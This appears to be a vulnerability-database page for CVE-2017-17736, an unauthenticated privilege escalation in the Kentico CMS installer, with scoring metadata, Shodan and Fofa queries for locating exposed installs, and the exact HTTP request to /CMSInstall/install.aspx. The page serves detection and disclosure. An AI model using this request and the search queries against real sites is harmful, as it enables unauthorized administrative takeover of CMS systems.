🔙 목록으로 돌아가기

CVE-2017-17736: Kentico - Installer Privilege Escalation

TitleKentico - Installer Privilege Escalation
Authorshiar
SeverityCritical
ImpactAn attacker can gain administrative privileges on the Kentico CMS system.
RemediationUpgrade to the latest version of Kentico CMS to fix the privilege escalation vulnerability.
CVSS Score9.8
EPSS Score0.92649
CVE IDCVE-2017-17736
CWE IDCWE-425
Shodan Querycpe:"cpe:2.3:a:kentico:kentico_cms"http.title:"kentico database setup"
Fofa Querytitle="kentico database setup"
Tags cve2017 cve kentico cms install unauth edb vuln

🔍 Vulnerability Description

Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.

🌐 HTTP Request

GET /CMSInstall/install.aspx HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-17736.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-17736.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A